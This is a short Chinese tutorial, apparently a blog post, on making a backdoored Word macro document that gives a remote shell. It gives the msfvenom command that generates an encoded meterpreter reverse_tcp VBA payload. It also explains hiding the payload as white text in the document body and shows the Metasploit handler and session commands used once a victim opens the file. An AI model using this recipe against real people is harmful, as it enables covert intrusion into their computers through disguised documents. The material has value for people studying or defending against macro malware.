1.1.1 使用office宏获取shell
1.1.1.1 生成宏后门
# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.10.180 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba-exe

1.1.1.2 制作带后门的宏文档
复制第一段代码到编辑器中:
复制第二段代码payload到word正文:
将字体设置为白色,增加迷惑性:
另存为启用宏的word文档:
1.1.1.3 启动msf监听
msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST 192.168.10.180 LHOST => 192.168.10.180 msf6 exploit(multi/handler) > run –j
1.1.1.4 打开文档测试连接
msf6 exploit(multi/handler) > sessions
msf6 exploit(multi/handler) > sessions -i 1 # 查看后门进程 meterpreter > getpid Current pid: 2224 meterpreter > ps


我的微信
如果有技术上的问题可以扫一扫我的微信